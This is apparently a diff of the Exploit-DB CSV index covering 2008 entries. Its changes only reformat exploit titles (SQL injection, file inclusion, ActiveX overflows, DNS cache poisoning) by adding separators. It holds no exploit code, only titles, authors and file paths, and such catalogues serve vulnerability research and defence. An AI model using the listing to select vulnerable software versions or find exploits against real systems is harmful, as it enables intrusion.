Exploit",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - (SQL/XSS/LFI) SQL Injection Exploit",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 @@ -5031,7 +5031,7 @@ id,file,description,date,author,platform,type,port 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 -5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 +5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer - ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 @@ -5092,8 +5092,8 @@ id,file,description,date,author,platform,type,port 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - (id) SQL Injection",2008-04-16,cO2,php,webapps,0 5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 NSF demuxer Stack Overflow PoC",2008-04-16,"Guido Landi",linux,dos,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 -5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0 -5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BoF Exploit (Metasploit)",2008-04-17,oveRet,windows,remote,0 +5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0 +5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote BoF Exploit (Metasploit)",2008-04-17,oveRet,windows,remote,0 5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - (location) Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - (category_ID) SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 @@ -5162,8 +5162,8 @@ id,file,description,date,author,platform,type,port 5527,platforms/php/webapps/5527.pl,"Joomla Component Webhosting - (catid) Blind SQL Injection Exploit",2008-05-01,cO2,php,webapps,0 5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 5529,platforms/php/webapps/5529.txt,"vlbook 1.21 - (XSS/LFI) Multiple Vulnerabilities",2008-05-01,"Khashayar Fereidani",php,webapps,0 -5530,platforms/windows/remote/5530.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Remote BoF Exploit",2008-05-02,lhoang8500,windows,remote,0 -5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b SQL Injection",2008-05-02,InjEctOr5,php,webapps,0 +5530,platforms/windows/remote/5530.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Remote BoF Exploit",2008-05-02,lhoang8500,windows,remote,0 +5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b - SQL Injection",2008-05-02,InjEctOr5,php,webapps,0 5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 5533,platforms/php/webapps/5533.txt,"BlogMe PHP - (comments.php id) SQL Injection",2008-05-03,His0k4,php,webapps,0 5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilties",2008-05-03,"Luigi Auriemma",multiple,remote,0 @@ -5268,13 +5268,13 @@ id,file,description,date,author,platform,type,port 5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion Exploit",2008-05-17,0in,php,webapps,0 5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injection",2008-05-18,dun,php,webapps,0 5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple SQL Injection",2008-05-18,dun,php,webapps,0 -5643,platforms/php/webapps/5643.txt,"Ajax framework (lang) Local File Inclusion",2008-05-18,dun,php,webapps,0 +5643,platforms/php/webapps/5643.txt,"Ajax framework - (lang) Local File Inclusion",2008-05-18,dun,php,webapps,0 5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add-Admin",2008-05-18,t0pP8uZz,php,webapps,0 5646,platforms/php/webapps/5646.txt,"easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 5647,platforms/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - (admin.php) Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0 5648,platforms/php/webapps/5648.pl,"MeltingIce File System 1.0 - Remote Arbitrary Add-User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System 1.1a Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 +5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System 1.1a - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5651,platforms/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0 5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 beta - (thread.php id) SQL Injection Exploit",2008-05-19,Stack,php,webapps,0 @@ -5351,7 +5351,7 @@ id,file,description,date,author,platform,type,port 5724,platforms/php/webapps/5724.txt,"pLog (albumId) SQL Injection",2008-06-02,DreamTurk,php,webapps,0 5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - (SQL/XSS) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow Exploit PoC",2008-06-02,securfrog,windows,dos,0 -5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b Remote Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0 +5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b - Remote Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0 5729,platforms/php/webapps/5729.txt,"Joomla Component joomradio 1.0 - (id) SQL Injection",2008-06-03,His0k4,php,webapps,0 5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps,0 5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - (comment.asp) SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 @@ -5367,7 +5367,7 @@ id,file,description,date,author,platform,type,port 5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - (SQL/XSS) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 5743,platforms/php/webapps/5743.txt,"Joomla Component simpleshop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0 -5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0 +5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote BoF Exploit",2008-06-05,shinnai,windows,remote,0 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote BoF Exploit (2)",2008-06-05,shinnai,windows,remote,0 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 @@ -5393,7 +5393,7 @@ id,file,description,date,author,platform,type,port 5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 -5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b (css) Local File Inclusion",2008-06-10,Unohope,php,webapps,0 +5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - (css) Local File Inclusion",2008-06-10,Unohope,php,webapps,0 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (XSS/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0 @@ -5472,7 +5472,7 @@ id,file,description,date,author,platform,type,port 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 5849,platforms/asp/webapps/5849.txt,"doITlive CMS 2.50 - (SQL Injection/XSS) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Remote File Upload",2008-06-18,Alemin_Krali,php,webapps,0 -5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow PoC",2008-06-18,shinnai,windows,dos,0 +5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - vb6skit.dll Buffer Overflow PoC",2008-06-18,shinnai,windows,dos,0 5852,platforms/php/webapps/5852.txt,"netBIOS - (showNews.php newsid) SQL Injection",2008-06-18,"security fears team",php,webapps,0 5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - (index.php cat) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 @@ -5554,7 +5554,7 @@ id,file,description,date,author,platform,type,port 5931,platforms/php/webapps/5931.pl,"TOKOKITA - (barang.php produk_id) SQL Injection Exploit",2008-06-24,k1tk4t,php,webapps,0 5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 -5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0 +5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0 5935,platforms/php/webapps/5935.pl,"Mambo Component Articles (artid) Blind SQL Injection Exploit",2008-06-25,"Ded MustD!e",php,webapps,0 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Remote Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 @@ -5636,7 +5636,7 @@ id,file,description,date,author,platform,type,port 6016,platforms/php/webapps/6016.pl,"fuzzylime CMS 3.01a - (file) Local File Inclusion Exploit",2008-07-07,Cod3rZ,php,webapps,0 6017,platforms/php/webapps/6017.pl,"Triton CMS Pro (X-Forwarded-For) Blind SQL Injection Exploit",2008-07-07,girex,php,webapps,0 6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition Remote Code Execution Exploit",2008-07-07,Ams,php,webapps,0 -6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Exploit",2008-07-07,ka0x,php,webapps,0 +6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - (idDirectory) Blind SQL Injection Exploit",2008-07-07,ka0x,php,webapps,0 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin Exploit",2008-07-08,"CWH Underground",php,webapps,0 @@ -5682,7 +5682,7 @@ id,file,description,date,author,platform,type,port 6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection Exploit",2008-07-13,DNX,php,webapps,0 -6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 +6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold - (XSS/SQL) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 6071,platforms/php/webapps/6071.txt,"CodeDB - (list.php lang) Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 @@ -5704,7 +5704,7 @@ id,file,description,date,author,platform,type,port 6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injection",2008-07-16,Mr.SQL,php,webapps,0 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 -6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 +6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Remote SELinux Privilege Elevation Exploit (Auth)",2008-07-17,eliteboy,linux,remote,0 @@ -5733,7 +5733,7 @@ id,file,description,date,author,platform,type,port 6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 - (RFI/SQLl/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - (default.asp catid) SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 -6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 +6120,platforms/minix/dos/6120.txt,"minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 @@ -5742,7 +5742,7 @@ id,file,description,date,author,platform,type,port 6126,platforms/php/webapps/6126.txt,"ibase 2.03 - (download.php) Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - (id) SQL Injection",2008-07-24,IRAQI,php,webapps,0 -6129,platforms/minix/dos/6129.txt,"minix 3.1.2a tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 +6129,platforms/minix/dos/6129.txt,"minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 - (RFI/XSS/ig) Multiple Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - (id) SQL Injection",2008-07-25,nuclear,php,webapps,0 @@ -5765,7 +5765,7 @@ id,file,description,date,author,platform,type,port 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download",2008-07-28,DSecRG,windows,remote,0 -6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BoF Exploit",2008-07-28,Elazar,windows,remote,0 +6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control BoF Exploit",2008-07-28,Elazar,windows,remote,0 6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 @@ -5782,13 +5782,13 @@ id,file,description,date,author,platform,type,port 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard (Cat) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 -6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script (cid) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 -6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - (cid) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 - (Calendar Module) SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution Exploit",2008-07-30,"GulfTech Security",php,webapps,0 6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - (XSS/LFI/SQL) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 6174,platforms/multiple/dos/6174.txt,"F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 -6175,platforms/windows/remote/6175.html,"NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit",2008-07-31,shinnai,windows,remote,0 +6175,platforms/windows/remote/6175.html,"NCTsoft - AudFile.dll ActiveX Control Remote Buffer Overflow Exploit",2008-07-31,shinnai,windows,remote,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 Cookie Poisoning and Login Bypass",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution Exploit",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - LFI / Remote Code Execution Exploit",2008-07-31,EgiX,php,webapps,0 @@ -5862,7 +5862,7 @@ id,file,description,date,author,platform,type,port 6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) BoF Exploit (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 6257,platforms/windows/dos/6257.pl,"WS_FTP Home/Professional FTP Client Remote Format String PoC",2008-08-17,securfrog,windows,dos,0 6258,platforms/php/webapps/6258.txt,"PHPBasket - (product.php pro_id) SQL Injection",2008-08-17,r45c4l,php,webapps,0 -6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 +6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injection",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"php live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 6262,platforms/windows/dos/6262.txt,"VMware Workstation - (hcmon.sys 6.0.0.45731) Local DoS",2008-08-18,g_,windows,dos,0 @@ -5891,7 +5891,7 @@ id,file,description,date,author,platform,type,port 6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - (name) SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 6301,platforms/php/webapps/6301.txt,"ezContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 -6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a Remote Buffer Overflow Exploit",2008-08-25,"Guido Landi",windows,remote,0 +6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow Exploit",2008-08-25,"Guido Landi",windows,remote,0 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem Auth Bypass Exploit",2008-08-25,noensr,hardware,remote,0 6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Remote Arbitrary File Upload Exploit",2008-08-25,t0pP8uZz,php,webapps,0 @@ -5905,16 +5905,16 @@ id,file,description,date,author,platform,type,port 6315,platforms/php/webapps/6315.txt,"iFdate 2.0.3 - SQL Injection",2008-08-26,~!Dok_tOR!~,php,webapps,0 6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection Exploit (2)",2008-08-26,c411k,php,webapps,0 6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio - (Msmask32.ocx) ActiveX Remote BoF Exploit",2008-08-26,Koshi,windows,remote,0 -6318,platforms/windows/remote/6318.html,"Ultra Office ActiveX Control Remote Buffer Overflow Exploit",2008-08-27,shinnai,windows,remote,0 -6319,platforms/windows/dos/6319.html,"Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 +6318,platforms/windows/remote/6318.html,"Ultra Office - ActiveX Control Remote Buffer Overflow Exploit",2008-08-27,shinnai,windows,remote,0 +6319,platforms/windows/dos/6319.html,"Ultra Office - ActiveX Control Remote Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 6320,platforms/php/webapps/6320.txt,"phpMyRealty 1.0.9 - Multiple SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 6321,platforms/php/webapps/6321.txt,"YourOwnBux 3.1 / 3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local BoF Exploit",2008-08-28,Koshi,windows,local,0 6323,platforms/windows/remote/6323.html,"Friendly Technologies - (fwRemoteCfg.dll) ActiveX Remote BoF Exploit",2008-08-28,spdr,windows,remote,0 6324,platforms/windows/remote/6324.html,"Friendly Technologies - (fwRemoteCfg.dll) ActiveX Command Exec Exploit",2008-08-28,spdr,windows,remote,0 6325,platforms/php/webapps/6325.php,"Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 -6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility ActiveX Memory Corruption DoS",2008-08-29,"YAG KOHHA",windows,dos,0 -6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC",2008-08-29,shinnai,windows,dos,0 +6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption DoS",2008-08-29,"YAG KOHHA",windows,dos,0 +6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar - ActiveX Remote Buffer Overflow PoC",2008-08-29,shinnai,windows,dos,0 6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - (.asx) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 @@ -5952,7 +5952,7 @@ id,file,description,date,author,platform,type,port 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0 6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote BoF Exploit",2008-09-05,SVRT,windows,remote,0 6368,platforms/php/webapps/6368.php,"AWStats Totals - (awstatstotals.php sort) Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 -6369,platforms/php/webapps/6369.py,"devalcms 1.4a XSS / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0 +6369,platforms/php/webapps/6369.py,"devalcms 1.4a - XSS / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - (index.php id) Blind SQL Injection Exploit",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6372,platforms/windows/dos/6372.html,"Google Chrome Browser 0.2.149.27 A HREF Denial of Service",2008-09-05,Shinnok,windows,dos,0 @@ -6075,7 +6075,7 @@ id,file,description,date,author,platform,type,port 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0 6500,platforms/php/webapps/6500.txt,"Explay CMS 2.1 - Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0 6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - (index.php page) SQL Injection",2008-09-20,0x90,php,webapps,0 -6502,platforms/php/webapps/6502.txt,"Diesel Pay Script (area) SQL 